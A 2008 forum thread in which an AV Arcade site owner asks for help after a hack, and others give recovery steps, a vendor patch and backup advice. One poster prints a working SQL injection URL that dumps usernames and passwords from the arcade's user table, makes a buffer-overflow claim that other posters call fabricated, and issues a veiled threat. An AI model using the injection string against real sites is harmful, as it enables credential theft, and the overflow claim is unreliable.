1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.
  2. Better Analytics for WordPress Get It Free

My site has been hacked - what do I do?

Discussion in 'Security' started by urbt, Jul 19, 2008.

  1. #1
    My site: http://www.koolkidz.co.uk
    has been hacked. I have no idea where the vulnerability came from but it's AvArcade v3 if that's any help. Please help, I have no idea what to do!
     
    urbt, Jul 19, 2008 IP
  2. And!

    And! Active Member

    Messages:
    559
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    60
    #2
    First thing, is to not take it personally, because your not the only AVArcade site to get hacked in the last couple of days. There seems to be 100`s of AVArcade sites that have been hacked including one of mine. The people on Zone-H have hacked over 1,000 sites in the last 2 days http://www.zone-h.org/index.php?option=com_attacks&Itemid=45 dont click on any of the sites that have been hacked though, as there are some that have been planted with trojans.


    You will probably not be able to log in to your admin, as it is likely your password has been changed, so you will have to sign up for a new account and use phpmyadmin to give your new account admin rights.
    Log in to admin and put your site back to where it was, then use phpmyadmin to remove admin rights, or you could try what I did, and password protect my admin folder with a ridiculously long password.


    There will probably be more info about this vulnerability later?
     
    And!, Jul 19, 2008 IP
  3. Andy-V

    Andy-V Active Member

    Messages:
    409
    Likes Received:
    64
    Best Answers:
    0
    Trophy Points:
    90
    #3
    Hi there,

    Everyone should download this file: avscripts.net/avarcade/securityfix.zip

    And then upload it to your main AV Arcade directory. I hope this plugs the exploit. Please tell me if you use this new file and still get hacked.

    Andy
     
    Andy-V, Jul 19, 2008 IP
    And! likes this.
  4. And!

    And! Active Member

    Messages:
    559
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    60
    #4
    Thanks for the swift support:)
    Your doing a great job Andy!
     
    And!, Jul 19, 2008 IP
  5. Andy-V

    Andy-V Active Member

    Messages:
    409
    Likes Received:
    64
    Best Answers:
    0
    Trophy Points:
    90
    #5
    Andy-V, Jul 19, 2008 IP
  6. Yousif

    Yousif Banned

    Messages:
    234
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Updates mean nothing if you don't understand what caused the insecurity. Firstly, this script was flawed because of the way cookies were issued. Gaining administrative access was easy because the cookies can be manipulated in values. The PHP script that "validates" the cookie value only checks the ID, and not the legit authentication/authorization. I've also audited the source code and it appears that a remote buffer overflow exploit can be executed. Yet another exploit I found was through its SQL database. You are able to SQL Inject commands that allow to dump the ID (login information) from the form at view_page.php. I would suggest developing your own custom script or PM me for a sample security assessment. It costs nothing and it's able to tell you whether the web applications on your server are stable/secure or vulnerable.
     
    Yousif, Jul 19, 2008 IP
  7. Andy-V

    Andy-V Active Member

    Messages:
    409
    Likes Received:
    64
    Best Answers:
    0
    Trophy Points:
    90
    #7
    Yousif, very good. You might even convince people into using your 'services' like that.

    Heh.
     
    Andy-V, Jul 21, 2008 IP
  8. Ben-AceofTech

    Ben-AceofTech Active Member

    Messages:
    381
    Likes Received:
    20
    Best Answers:
    0
    Trophy Points:
    60
    #8
    I know many here already gave you the cure but its usually very useful to get in contact with your hosting company with something like this. One of my old sites on a PhpBB3 board had a n exploit. Guy got in, had ACP and FTP access... luckily I had my host put my site offline just long enough for me to find the fix then put it into effect before the hacker to do much damage.
     
    Ben-AceofTech, Jul 21, 2008 IP
  9. Yousif

    Yousif Banned

    Messages:
    234
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #9
    Are you trying to make fun of me?
     
    Yousif, Jul 21, 2008 IP
  10. Andy-V

    Andy-V Active Member

    Messages:
    409
    Likes Received:
    64
    Best Answers:
    0
    Trophy Points:
    90
    #10
    Well, you looked through the source code apparently and found a sql injection vulnerability in view_page.php. Now are you totally sure you downloaded the script, and found that vulnerability?

    Show me then, in that file, where the vulnerability lies.
     
    Andy-V, Jul 21, 2008 IP
  11. Yousif

    Yousif Banned

    Messages:
    234
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #11
    Yes, I'm sure I looked through the source code. It's publicly available at no cost.
     
    Yousif, Jul 21, 2008 IP
  12. Andy-V

    Andy-V Active Member

    Messages:
    409
    Likes Received:
    64
    Best Answers:
    0
    Trophy Points:
    90
    #12
    Well then show me the vulnerability, prove that YOU really did find a flaw in view_page.php.
     
    Andy-V, Jul 22, 2008 IP
  13. Yousif

    Yousif Banned

    Messages:
    234
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #13
    Exploit:
    /index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1
    Example:
    http://www.yourgame.org/index.php?t...1,username,password FROM ava_users WHERE id=1

    ^ Remote SQL Injection. Don't sit around here and doubt me. I highly suggest you do your work before you run your mouth. This is a forum, and as a community, we're here to establish help. If you feel like attacking people personally, go else where.
     
    Yousif, Jul 22, 2008 IP
  14. billy786

    billy786 Peon

    Messages:
    323
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    0
    #14
    Always keep a backup of your website/blog you never know when it can come in handy ;)
     
    billy786, Jul 22, 2008 IP
  15. Andy-V

    Andy-V Active Member

    Messages:
    409
    Likes Received:
    64
    Best Answers:
    0
    Trophy Points:
    90
    #15
    Yes, this would be an impressive find... but you are almost a year late. You see, you haven't looked at the source have you? You just googled AVA exploits and found a page all about view_page.php. This was an exploit found in version 2 of AV Arcade, this is now version 3.1.4.

    Try the link on AVA v3 sites, it doesn't do a thing. If you had looked at the source code, you would have seen it was fixed. Same goes with the admin cookie exploit.

    And as for remote buffer overflow exploit... well, the word 'fabrication' comes to mind.
     
    Andy-V, Jul 23, 2008 IP
  16. InFloW

    InFloW Peon

    Messages:
    1,488
    Likes Received:
    39
    Best Answers:
    0
    Trophy Points:
    0
    #16
    Do you even know what a buffer overflow is? It is when a data (a variable) is too large for it's allocated memory and no bounds checks are in place resulting in it writing to memory adjacent to it.

    If this sort of exploit existed in a PHP script it would be an issue with PHP itself.
     
    InFloW, Jul 23, 2008 IP
  17. Yousif

    Yousif Banned

    Messages:
    234
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #17
    Don't sit here and teach me anything like that again. If you ever disrespect me again, I can assure you that if you want to start something personal with me, you'll run a long crying. Why don't you PM me your IP? I'm here to help people out, don't mess with someone who has a bigger authority than you. Someone who can teach you a lesson, believe it or not. I'll be expecting your PM.
     
    Yousif, Jul 23, 2008 IP
  18. Yousif

    Yousif Banned

    Messages:
    234
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    0
    #18
    I'm a year late? The source code is freely available. Pay attention to what I say because I'm not here to con you. I downloaded the source code to his older version, found these issues and then confirmed they were existent upon the authors' who reported them. They were there, and I was able to find them. I'm not "late" in anything. If it's patched, well duh. But what he had was not secure.
     
    Yousif, Jul 23, 2008 IP
  19. Andy-V

    Andy-V Active Member

    Messages:
    409
    Likes Received:
    64
    Best Answers:
    0
    Trophy Points:
    90
    #19
    His version was still version 3. The problem was fixed in a later version of v2.

    If you had downloaded AVA even within the last year, you would have gotten the secure version.

    You simply went to this website and copied the information. You even copied the exact link including "yourgame.org".

    And you completely invented the 'remote buffer overflow exploit', because there is no such thing concerning php.

    You've been caught out. So stop with your stupid lies now and go occupy yourself with something worthwhile.
     
    Andy-V, Jul 23, 2008 IP
  20. hwmax

    hwmax Peon

    Messages:
    21
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #20
    This. I'd recommend making backups of your DB and uploaded files etc.. every day if not more if possible. Can always restore, you'll be kicking yourself if it happens again.
     
    hwmax, Jul 23, 2008 IP